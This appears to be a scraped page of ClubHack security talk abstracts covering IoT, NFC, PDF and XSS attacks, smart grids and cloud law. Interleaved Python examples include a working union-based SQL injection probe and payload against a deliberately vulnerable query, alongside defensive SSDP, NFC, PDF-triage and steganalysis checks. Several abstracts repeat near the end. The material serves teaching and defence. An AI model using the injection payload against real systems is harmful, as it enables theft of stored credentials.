The document discusses potential security issues with connected home devices and proposes a scenario called "Crazy Toaster", in which a toaster or other networked appliance is compromised, joins the local network and becomes a threat to the other hosts on it. It outlines the steps to build a "Crazy Toaster Trojan" on top of UPnP and describes demonstrations of the SSDP denial-of-service vulnerability on Windows XP networks. The document concludes with future hacking ideas and the risks of interconnected devices and embedded systems.
The document discusses security issues with smart TVs. While smart TVs offer convenient features through internet connectivity, they also pose privacy and security risks. The document outlines several problems: smart TVs are often insecure because of bad coding practices, rely on security through obscurity, can be vulnerable on the server side and through installed apps, and may not receive frequent and thorough security updates from vendors. Access to a smart TV could allow an attacker to spy on homeowners or on company meeting rooms.
Big data and cloud computing increase data risk because more data is concentrated in single locations. Strict data privacy laws in countries such as India and the US regulate data breaches. Many large companies have experienced major breaches compromising millions of customer records. Common causes of breaches include lost or stolen devices, malware and phishing. The costs of a breach are significant and include notification, monitoring, response, lawsuits and lost customer trust. Cyber insurance can help cover third-party liability and first-party costs associated with data breaches, but has limitations compared to other insurance policies. Prudent Insurance Brokers is an expert that can help businesses assess cybersecurity risks, design customized cyber insurance plans
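The UPnP piece of the Crazy Toaster scenario rests on SSDP, the multicast discovery protocol in which a device announces itself with a NOTIFY message and a control point then fetches the description document named in the announcement's LOCATION header. As an added example (not code from the talk), the Python below parses SSDP datagrams and applies the check a control point should make before following LOCATION: an announcement that points off the local subnet or at an unexpected port is one to refuse rather than fetch. The 192.168.1.0/24 subnet and the sample datagrams are constructed for this example.

```python
"""Parse SSDP datagrams and vet the LOCATION header before a control point
follows it. Added example; the local subnet and sample datagrams are
constructed for illustration."""
import ipaddress
from urllib.parse import urlsplit

# Assumption for the example: the home network is a single /24.
LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")


def parse_ssdp(datagram: bytes) -> dict:
    """Split an SSDP (HTTP-over-UDP) datagram into start line and headers.
    Header names are case-insensitive, so they are stored lower-cased."""
    lines = datagram.decode("latin-1").split("\r\n")
    msg = {"start_line": lines[0].strip(), "headers": {}}
    for line in lines[1:]:
        if not line.strip():        # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            msg["headers"][name.strip().lower()] = value.strip()
    return msg


def location_issues(msg: dict) -> list:
    """Reasons not to fetch the description URL an announcement advertises."""
    issues = []
    loc = msg["headers"].get("location")
    if loc is None:                 # M-SEARCH requests carry no LOCATION
        return issues
    url = urlsplit(loc)
    if url.scheme != "http":
        issues.append(f"unexpected scheme {url.scheme!r}")
    try:
        addr = ipaddress.ip_address(url.hostname or "")
    except ValueError:
        issues.append(f"LOCATION host is not an IP literal: {url.hostname!r}")
        return issues
    if addr not in LOCAL_NET:
        issues.append(f"LOCATION {addr} is outside {LOCAL_NET}")
    if url.port is not None and url.port < 1024 and url.port != 80:
        issues.append(f"LOCATION targets privileged port {url.port}")
    return issues


# Constructed datagrams: a well-behaved appliance, a rogue announcement that
# would send every listening control point to a third party, and a search.
BENIGN_NOTIFY = (
    b"NOTIFY * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"NT: urn:schemas-upnp-org:device:Toaster:1\r\n"
    b"NTS: ssdp:alive\r\n"
    b"LOCATION: http://192.168.1.42:49152/desc.xml\r\n"
    b"USN: uuid:toaster-0001::urn:schemas-upnp-org:device:Toaster:1\r\n\r\n"
)
ROGUE_NOTIFY = BENIGN_NOTIFY.replace(
    b"http://192.168.1.42:49152/desc.xml", b"http://203.0.113.9:22/desc.xml")
HOSTNAME_NOTIFY = BENIGN_NOTIFY.replace(
    b"http://192.168.1.42:49152/desc.xml", b"http://evil.example/desc.xml")
MSEARCH = (
    b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
    b'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n'
)

if __name__ == "__main__":
    for d in (BENIGN_NOTIFY, ROGUE_NOTIFY, HOSTNAME_NOTIFY, MSEARCH):
        msg = parse_ssdp(d)
        print(msg["start_line"], msg["headers"].get("location"), "->",
              location_issues(msg) or "ok")
```

The check is deliberately conservative: a legitimate device always advertises an HTTP URL on its own LAN address and an unprivileged port, so anything else is worth logging rather than fetching.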
Summarising Snowden and Snowden as an internal threat (ClubHack)
A quick look back at Snowden's revelations, also looking at Snowden as an insider threat.
*This presentation ends abruptly: during the talk it served as food for thought and a kickstart for the next session.*
Fatcat Automatic Web SQL Injector by Sandeep Kamble (ClubHack)
What is the FatCat SQL injector? An automatic SQL injection tool called FatCat.
FatCat's purpose: testing your web application and exploiting it more deeply.
FatCat supports:
1) MySQL 5.0
FatCat features:
Union-based SQL injection
Error-based SQL injection
ModSecurity (WAF) bypass
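The first of the two injection classes FatCat automates is shown below in an added example (not FatCat's code): a query that splices its parameter into the SQL text, the ORDER BY probing used to learn how many columns the original SELECT returns, the UNION payload that then pulls rows out of another table, and the bound-parameter form that defeats it. It uses an in-memory SQLite database instead of MySQL 5.0, which is an assumption made for portability; the schema and rows are constructed. Error-based injection is not shown because it relies on MySQL-specific functions that echo data back inside error messages, which SQLite does not offer.

```python
"""Union-based SQL injection against a deliberately vulnerable query, beside
the parameterised form that defeats it. Added example; SQLite stands in for
MySQL 5.0 and the data is constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a public products table and a private users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'toaster', '49.00'), (2, 'kettle', '29.00');
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bob', 's3cret');
    """)
    return con


def product_vulnerable(con, product_id: str) -> list:
    """Vulnerable: the untrusted id is spliced straight into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE id = {product_id}"
    return con.execute(sql).fetchall()


def product_safe(con, product_id: str) -> list:
    """Hardened: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return con.execute(sql, (product_id,)).fetchall()


def find_column_count(con, max_cols: int = 10) -> int:
    """Union-based step 1: ORDER BY n succeeds until n exceeds the column
    count, so the first failing n tells the attacker how wide the UNION
    payload must be."""
    for n in range(1, max_cols + 1):
        try:
            product_vulnerable(con, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def dump_users(con) -> list:
    """Union-based step 2: a SELECT of matching width appended to the query
    returns rows from a table the endpoint was never meant to expose."""
    width = find_column_count(con)
    assert width == 2, "payload below is written for a two-column query"
    payload = "0 UNION SELECT username, password FROM users"
    return product_vulnerable(con, payload)


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(db))
    print("leaked:", dump_users(db))
    print("same payload, bound:",
          product_safe(db, "0 UNION SELECT username, password FROM users"))
```

The ORDER BY probe and the UNION payload are exactly what a tool like FatCat sends automatically; the bound-parameter version returns nothing for the payload because the whole string is compared as a value against the id column, never parsed as SQL.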
The Difference Between the Reality and Feeling of Security by Thomas Kurian (ClubHack)
The paper shall focus on the following:
1) Introduction to the problem: focus on “security awareness”, not “behavior”
2) Real-life case study of why a US$100,000 “security awareness” project failed
a. Identifying the human component in information security risks
b. Addressing the human component using “awareness” and “behavior” strategies
4) Sample real-life case studies where quantifiable change has been observed
Original research and publications
The talk is modeled on the methodology HIMIS (Human Impact Management for Information Security) authored by Anup Narayanan and published under “Creative Commons,
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup... (ClubHack)
NFC (Near Field Communication) lets a phone perform specified actions whenever it detects an NFC tag or a signal from another NFC-enabled device. Most recent phones, including the Samsung Galaxy S3, Nokia Lumia 610 and BlackBerry Bold, ship with NFC. NFC also lets enterprises and payment gateways simplify user actions such as connecting to a Wi-Fi network, setting a bookmark or making a payment.
Gone are the days of sending Android malware links through URLs or attachments. This talk shows how an attacker could steal private and sensitive information from a phone, and even perform malicious actions on it, using NFC as the attack vector. NFC attack vectors come in two forms: active (the attacker's phone acts as a proxy between the victim's smartphone and the payment terminal) and passive (using NFC tags). For the demonstrations, the speakers create malicious NFC tags which, when read by any NFC-enabled smartphone, steal sensitive information from the phone without the user's knowledge and trick the user into installing malicious applications. The talk then covers how an attacker in close proximity to another NFC-enabled phone could get a remote shell on it and compromise its security, and how viral an NFC attack could become in future if proper security measures are not enforced.
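The passive vector works because a phone acts on whatever NDEF record a tag carries, typically a URI record whose scheme decides the action (a web link opens the browser, a market link opens the app store). The added example below, which is not code from the talk, builds and parses NDEF URI records and shows the decision a reader should make before acting: open only an allow-listed scheme automatically, prompt for everything else. The single-scheme allow-list and the sample tags are assumptions constructed for the example.

```python
"""Build and parse NDEF URI records, then decide whether a tag's URI may be
acted on without asking the user. Added example; the allow-list and the
sample tags are constructed."""
import struct

# URI identifier codes from the NFC Forum URI Record Type Definition (subset).
URI_PREFIXES = {0x00: "", 0x01: "http://www.", 0x02: "https://www.",
                0x03: "http://", 0x04: "https://", 0x05: "tel:", 0x06: "mailto:"}
PREFIX_CODES = {v: k for k, v in URI_PREFIXES.items() if v}
TNF_WELL_KNOWN = 0x01


def encode_uri_record(uri: str) -> bytes:
    """One short NDEF record: flags MB|ME|SR, TNF=well-known, type 'U'.
    The payload starts with the prefix code, then the rest of the URI."""
    code, rest = 0x00, uri
    for prefix, c in sorted(PREFIX_CODES.items(), key=lambda kv: -len(kv[0])):
        if uri.startswith(prefix):
            code, rest = c, uri[len(prefix):]
            break
    payload = bytes([code]) + rest.encode("utf-8")
    header = 0x80 | 0x40 | 0x10 | TNF_WELL_KNOWN      # MB | ME | SR | TNF
    return bytes([header, 1, len(payload)]) + b"U" + payload


def parse_ndef(message: bytes) -> list:
    """Walk the records of an NDEF message; return (tnf, type, payload)."""
    records, off = [], 0
    while off < len(message):
        flags = message[off]; off += 1
        tnf, short, has_id = flags & 0x07, flags & 0x10, flags & 0x08
        type_len = message[off]; off += 1
        if short:
            payload_len = message[off]; off += 1
        else:
            payload_len = struct.unpack(">I", message[off:off + 4])[0]; off += 4
        id_len = 0
        if has_id:
            id_len = message[off]; off += 1
        rtype = message[off:off + type_len]; off += type_len
        off += id_len                                  # skip the record ID
        payload = message[off:off + payload_len]; off += payload_len
        records.append((tnf, rtype, payload))
        if flags & 0x40:                               # ME: last record
            break
    return records


def decode_uri(record) -> str:
    tnf, rtype, payload = record
    if tnf != TNF_WELL_KNOWN or rtype != b"U" or not payload:
        raise ValueError("not a URI record")
    return URI_PREFIXES.get(payload[0], "") + payload[1:].decode("utf-8")


# Assumption: only https links are followed without asking.
ALLOWED_SCHEMES = {"https"}


def tag_action(message: bytes) -> str:
    """'open' for an allow-listed URI, 'prompt' for anything else or malformed."""
    try:
        uri = decode_uri(parse_ndef(message)[0])
    except (ValueError, IndexError):
        return "prompt"
    scheme = uri.split(":", 1)[0].lower()
    return "open" if scheme in ALLOWED_SCHEMES else "prompt"


if __name__ == "__main__":
    # Constructed tags: a plain link, an app-store link, a dialler string.
    for uri in ("https://example.com", "market://details?id=evil.app", "tel:*#06#"):
        tag = encode_uri_record(uri)
        print(uri, "->", tag_action(tag), tag.hex())
```

Every tag the talk describes, from the wifi-config shortcut to the "install this app" lure, arrives as a record like the ones above; the difference between a convenience and a compromise is only whether the reader acts on it unasked.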
Smart grids add communication capability and intelligence to traditional grids. They are enabled by intelligent sensors and actuators, extended data management systems, expanded two-way communication between utility operations facilities and customers, network security, national integration, and self-healing, adaptive operation. The aims are improved distribution and transmission system operation, freedom for customers to purchase power based on dynamic pricing, improved power quality with less wastage, and integration of a large variety of generation options.
The more complex and critical an infrastructure is, the more vulnerable it tends to be. Since 1994 there have been many incidents in which grid systems were attacked; the best known is the Stuxnet worm, which targeted the control systems of Iran's nuclear programme and spread far beyond it. The talk surveys the different types of attack and the security a smart grid needs.
Legal Nuances to the Cloud by Ritambhara Agrawal (ClubHack)
This presentation highlights the key legal risks in cloud computing and their implications. The cloud is inherently multi-jurisdictional, encompassing remote hosting and processing of data. This gives rise to multiple legal issues including security and privacy of the data, IP rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remain the biggest concern for companies. Businesses should look at issues ranging from the physical location of the data centres, protection of the data against any adversity and intrusion, and access rights management.
Cloud servers are often located in different countries, which results in trans-border data flow. Each country has its own legal rules and regulations on data protection and privacy, and these can bring complications in the form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to cloud contracts. Interoperability of the data in the event of termination of a vendor's services is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy Hiremath (ClubHack)
With the development of technology, the interdependence of various infrastructures has increased, and with it their vulnerability. The security of the National Information Infrastructure concerns the nation's stability and economic security. So far, research in Internet security has focused primarily on securing the information rather than the infrastructure itself.
The pervasive and ubiquitous nature of the Internet, coupled with growing concern about cyber attacks, means we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop hardware redesign architectures, algorithms and protocols that realise a dependable Internet infrastructure. The first and foremost step towards this goal is a comprehensive understanding of the security threats and the existing solutions. This talk attempts to fulfil that step by classifying infrastructure attacks into four main categories: DNS hacking, routing table poisoning, packet mistreatment and denial-of-service attacks. It discusses the existing infrastructure solutions for each category and outlines a methodology for developing a secured nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan (ClubHack)
Today there is a flood of tools to help automate active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameter guessing are seldom performed even by skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex-encoded into a very inconsequential-looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of the time checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool designed for hybrid analysis. It performs automated passive analysis of a web application, with no input from the user in some cases and with application-specific input in others. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
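The "sensitive data hex-encoded into an inconsequential-looking string" check is one of the passive analyses the abstract has in mind. The added example below (not HAWAS itself) does the mechanical part: it scans parameter and cookie values for hex and base64 substrings and surfaces only the ones that decode to readable text, so a session token that is really `user:password` in disguise stands out. The request data is constructed.

```python
"""Find hex- and base64-encoded substrings in request data and decode the
ones that turn out to be readable text. Added example; the parameter values
below are constructed, not taken from a real application."""
import base64
import re
import string

# A run of at least 6 hex bytes (12 hex digits), not part of a longer hex run.
HEX_RE = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){6,}(?![0-9A-Fa-f])")
# A base64 token of 16+ alphabet characters with optional padding.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def looks_like_text(data: bytes) -> bool:
    """True when the bytes are non-empty, valid UTF-8 and entirely printable."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return bool(text) and all(ch in PRINTABLE for ch in text)


def find_encoded(value: str) -> list:
    """Return (encoding, token, decoded) for each substring that hides text."""
    hits = []
    for m in HEX_RE.finditer(value):
        raw = bytes.fromhex(m.group(0))
        if looks_like_text(raw):
            hits.append(("hex", m.group(0), raw.decode("utf-8")))
    for m in B64_RE.finditer(value):
        token = m.group(0)
        if all(ch in string.hexdigits for ch in token):
            continue                    # pure hex: already handled above
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        except ValueError:              # binascii.Error is a ValueError
            continue
        if looks_like_text(raw):
            hits.append(("base64", token, raw.decode("utf-8")))
    return hits


def scan(params: dict) -> dict:
    """Run find_encoded over every value; keep only the names with findings."""
    report = {}
    for name, value in params.items():
        hits = find_encoded(value)
        if hits:
            report[name] = hits
    return report


# Constructed request data for the example: one base64 credential in a
# cookie, one hex-encoded key/value in a referrer-style parameter, one
# ordinary search term.
SAMPLE_PARAMS = {
    "cookie": "sid=YWRtaW46aHVudGVyMg==; theme=dark",
    "ref": "73657373696f6e3d61646d696e",
    "q": "toaster",
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_PARAMS).items():
        for encoding, token, decoded in hits:
            print(f"{name}: {encoding} {token!r} -> {decoded!r}")
```

The printable-text filter is what keeps the noise down: most long alphanumeric tokens decode to garbage and are dropped, so what remains is worth a human look.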
Hacking and Securing iOS Applications by Satish Bomisstty (ClubHack)
iOS applications share a common set of classes and depend heavily on the operating system's solutions for data communication, storage and encryption. Relying solely on Apple's implementation keeps them simple, but it affects the security of the applications. Though iOS comes with a strong set of security features such as code signing, ASLR, DEP, sandboxing and Data Protection, all of them are subject to attack. Relying only on iOS security can lead to the loss of sensitive data stored within the application once the device is compromised. Application security can be improved by understanding the weaknesses in the current implementation and adding code of one's own that does better.
The presentation illustrates several types of iOS application attack, such as runtime manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain and the Data Protection API and explains techniques to circumvent them. The presentation provides guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh Belgi (ClubHack)
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta (ClubHack)
The document discusses Content-Type attacks and how to protect against them. The author works as an information security consultant focusing on vulnerability assessment, penetration testing and secure environment setup. Content-Type attacks exploit vulnerabilities in client-side software such as Adobe Reader or Microsoft Office to execute malicious code: the attacker embeds malformed content that corrupts memory so that their shellcode runs. The document then covers the attack process, the structure of a malicious document, a demo, an overview of the PDF file format, analysing PDFs with scripts, and protection techniques such as keeping software updated, disabling scripts, enabling data execution prevention and not opening unknown attachments.
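The "analysing PDFs with scripts" step is the defender's first pass over a suspicious attachment: a malicious document needs something to fire the exploit (/OpenAction or an /AA additional-actions entry) and something to carry it (/JavaScript, /JS, /Launch), and authors routinely hide those names with the PDF #xx name escape so that a plain grep misses them. The added example below (not the author's script) counts those names after undoing the escaping and checks that obj/endobj pairs balance; both PDFs are constructed minimal files, not real samples.

```python
"""Static triage of a PDF: count the names a document attack needs
(/OpenAction, /JavaScript, /Launch and friends), undoing the #xx escaping
used to hide them, and check that obj/endobj balance. Added example; both
PDFs below are constructed minimal files."""
import re
from collections import Counter

RISKY_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm"}
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")   # a PDF name token
HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")    # #xx escape inside a name


def normalise_name(raw: bytes) -> str:
    """/Java#53cript -> /JavaScript, so escaping does not hide a keyword."""
    return HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count risky names (after normalisation), escaped names, and objects."""
    counts = Counter()
    for m in NAME_RE.finditer(data):
        token = m.group(0)
        if b"#" in token:
            counts["obfuscated_names"] += 1
        name = normalise_name(token)
        if name in RISKY_NAMES:
            counts[name] += 1
    counts["obj"] = len(re.findall(rb"\bobj\b", data))
    counts["endobj"] = len(re.findall(rb"\bendobj\b", data))
    return dict(counts)


def is_suspicious(report: dict) -> bool:
    """An automatic trigger plus active content is the classic drive-by shape."""
    triggers = report.get("/OpenAction", 0) + report.get("/AA", 0)
    active = (report.get("/JavaScript", 0) + report.get("/JS", 0)
              + report.get("/Launch", 0) + report.get("/RichMedia", 0))
    return triggers > 0 and active > 0


# Constructed: a document that runs script on open, with the name escaped.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /Java#53cript /JS (app.alert('hi')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
# Constructed: the same skeleton with no actions at all.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, pdf in (("sample", SAMPLE_PDF), ("clean", CLEAN_PDF)):
        report = triage_pdf(pdf)
        print(label, report, "suspicious" if is_suspicious(report) else "ok")
```

This is triage, not verdict: a benign form can legitimately carry JavaScript, and content inside compressed object streams (/ObjStm) is invisible to a byte scan until inflated, which is why that name is counted too.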
This document discusses cross-site scripting (XSS) and introduces XSSShell, a tool that uses XSS vulnerabilities to execute commands on a victim's browser. It begins with an introduction to XSS and its risks, then outlines XSS types and demonstrates XSSShell by exploiting vulnerabilities in a demo application. The document aims to show how XSSShell works by establishing a server and injecting client-side JavaScript to create an administrative interface that can control infected browsers.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and will continue to do so in the coming future too. We enjoy making this for you all. It is said that “A lot can happen over a cup of coffee”. We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine, and now it has come all this way… :). Two years look small when we look back. For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress, we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue we have Network Security in Tool Gyan, which will shed light on how to set up a secured network; Who Wants to be a Millionaire in Tool Gyan, check out for yourself what exactly it's all about ;) and TOR in Mom's Guide, for all those who thought 'It sounds very complicated to use, I’m not a hacker! I can’t use it!', by our author Federico from Italy.
From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with we have an article on PHP based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and Matriux section.
Do send us your feedback on abhijeet@chmag.in this will help us improve further.
This document discusses steganography, which is a method of hiding secret messages within other files or data streams. It provides definitions and examples of different types of steganography, including static steganography which hides messages in digital files, and dynamic steganography which hides messages in protocols like TCP/IP packets as they are transmitted over the internet. The document also discusses uses of steganography, such as watermarking to track copyrighted content, and concerns about potential terrorist use of steganography over the internet through covert channels. Detection of hidden messages, called steganalysis, and technology to help law enforcement monitor covert communications are also mentioned.
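The document's "static" steganography and its counterpart steganalysis are both easy to show on a byte stream. The added example below (not from the document) hides a message in the least significant bit of each sample of a cover, recovers it, and then runs the pairs-of-values chi-square test that detects exactly this kind of embedding: LSB replacement drives the counts of each value pair (2k, 2k+1) toward equality, so a cover whose samples were unevenly distributed loses that imbalance once it carries a payload. The cover is synthetic data generated in the block (an assumption standing in for 8-bit image samples), not an image from the original.

```python
"""LSB steganography in a byte stream (standing in for 8-bit pixel samples)
and a pairs-of-values chi-square check that detects it. Added example; the
cover data is synthetic and generated here."""
import random


def embed(cover: bytes, secret: bytes) -> bytes:
    """Hide `secret` in the LSBs of `cover`, prefixed by a 4-byte big-endian
    length so the extractor knows where to stop."""
    framed = len(secret).to_bytes(4, "big") + secret
    bits = [(byte >> i) & 1 for byte in framed for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for this secret")
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, from the LSBs."""
    def read_bytes(start: int, count: int) -> bytes:
        value = 0
        for i in range(count * 8):
            value = (value << 1) | (stego[start + i] & 1)
        return value.to_bytes(count, "big")
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def pov_chi_square(data: bytes) -> float:
    """Pairs-of-values statistic. A full-capacity LSB payload makes the
    counts of 2k and 2k+1 nearly equal, collapsing the statistic toward the
    degrees of freedom (127); an untouched, uneven cover scores far higher."""
    hist = [0] * 256
    for b in data:
        hist[b] += 1
    chi = 0.0
    for k in range(128):
        n0, n1 = hist[2 * k], hist[2 * k + 1]
        expected = (n0 + n1) / 2
        if expected:
            chi += (n0 - expected) ** 2 / expected
    return chi


def synthetic_cover(n: int = 4000, seed: int = 1) -> bytes:
    """Constructed cover whose samples favour even values (about 4:1), as
    coarsely quantised sensor data might; that imbalance is what the
    chi-square check keys on."""
    rng = random.Random(seed)
    return bytes(int(rng.random() * 128) * 2 + (rng.random() < 0.2) for _ in range(n))


def random_secret(n: int = 480, seed: int = 2) -> bytes:
    """Constructed payload sized to fill almost all of the cover's capacity."""
    rng = random.Random(seed)
    return bytes(int(rng.random() * 256) for _ in range(n))


if __name__ == "__main__":
    cover = synthetic_cover()
    stego = embed(cover, random_secret())
    print("recovered ok:", extract(stego) == random_secret())
    print("chi-square cover:", round(pov_chi_square(cover), 1),
          "stego:", round(pov_chi_square(stego), 1))
```

The test is only sensitive when the payload fills most of the cover; a short message embedded in a large image leaves most value pairs untouched, which is why practical steganalysis walks the data in windows and why embedders spread bits pseudo-randomly rather than sequentially.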
There was a time when mobile phones were the size of a shoe and had no features other than calling and SMS, and at that time I used to play the game Snake on my dad's phone :p Now, as time has passed, we have reached the age of smartphones, which are capable of doing lots of stuff, and a worldwide web of applications is causing serious concern because an attacker can use this platform to steal data. This issue of CHMag is dedicated to Mobile/Telecom Hacking and Security.
The coverpage of this December issue was released at ClubHack 2011, India’s Pioneer International Hacking Conference held last week. Talking about ClubHack Conference, if you missed ClubHack here are the presentations available at - http://www.slideshare.net/clubhack and videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collector's Editions (vol. 1 covers issues 1 to 10 and vol. 2 issues 11 to 20), please write back to us: info@chmag.in. As of now it's on-demand printing.
Like Snake, I have played lots of other games too, which are reflected in the previous cover pages I have designed, and yes, I promise another awesome cover page based on a game on the theme of Android security, which will be the theme of an upcoming issue; send in your articles to info@chmag.in
One Link provides direct access to a Facebook account without a username or password by bypassing all security checkpoints through a single link. The link contains parameters such as a photo or user ID and a secret key that can be brute-forced or socially engineered to gain full access to random Facebook accounts. Users should be aware of these direct links and the security risks they pose.
The document discusses using a Teensy microcontroller device to compromise secure environments. It begins by providing background on the presenter and an overview of topics to be covered. It then discusses limitations in typical pentests and how exploiting vulnerabilities is important. The document proposes using a Teensy device to bypass security controls and perform tasks like enabling RDP, downloading files, and keylogging. It demonstrates some payloads, notes current limitations, and ideas for future improvements like using additional storage. The conclusion is that Teensy can be used as a complete pentesting device if leveraged properly.
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
NFC or the Near Field Communication allows cell phones to perform specified actions whenever they detect NFC tags or signals from other NFC enabled device. Most of the recent phones including Samsung Galaxy S3, Nokia Lumia 610, Blackberry Bold etc have NFC enabled with them. NFC even helps enterprise/payment gateways to ease up users actions, such as connecting to a wifi, setting a bookmark, making payments etc.
Gone are the days of sending Android malware links through URL or attachments. In this talk, we will be showing how an attacker could steal the private and sensitive information from one’s phone and even perform malicious actions on user’s phone, using NFC as an attack vector. NFC attack vectors come in two forms : Active(setting attacker’s phone as a proxy between victim’s smartphone and the payment terminal) and Passive(using NFC tags).For our demonstrations, we would be creating malicious NFC tags which when detected by any smartphone(NFC enabled) would steal sensitive informations from the phones (without the users knowledge) as well as trick user to install malicious applications to his phone. Thereafter, we would also be talking about how an attacker could get in close proximity of another NFC-enabled phone, get a remote shell on the victim’s phone and compromise the phone’s security. We would also be discussing how viral an NFC attack could go in future, if proper security measures are not enforced.
Smart grids is an added communication capabilities and intelligence to traditional grids,smart grids are enabled by Intelligent sensors and actuators, Extended data management system,Expanded two way communication between utility operation system facilities and customers,Network security ,National integration ,Self healing and adaptive –Improve distribution and transmission system operation,Allow customers freedom to purchase power based on dynamic pricing ,Improved quality of power-less wastage ,Integration of large variety of generation options.
We have seen the more complex and critical infrastructure the more vulnerable they are. From the Year of 1994 we have seen lots of incidents where SmartGrid were Hacked the latest and booming incident was Stuxnet Worm which targeted Nuclear Power System of Iran and Worldwide.There are different types of Attacks we will see. Security needed for Smart Grid.
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
This presentation highlights the key legal risks and their implications in cloud computing. Cloud is inherently multi-jurisdictional, encompassing, remote hosting and processing of the data. This gives rise to multiple legal issues including security and privacy of the data, IP Rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remains the biggest concern for the companies. Businesses should look at issues ranging from physical location of the data centers, protection of the data against any adversity and intrusion, and access rights management.
The cloud servers are often located in different countries, which results in trans- border Data Flow. Each country has its own set of legal rules and regulations regarding data protection and privacy policies and the same can bring in complications in form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to the contract in the clouds. Interoperability of the data in the event of termination of services of a vendor is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy HiremathClubHack
With the development of technology, the interdependence of various infrastructures has increased, which also enhanced their vulnerabilities. The National Information Infrastructure security concerns the nation’s stability and economic security. So far, the research in Internet security primarily focused on securing the information rather than securing the infrastructure itself.
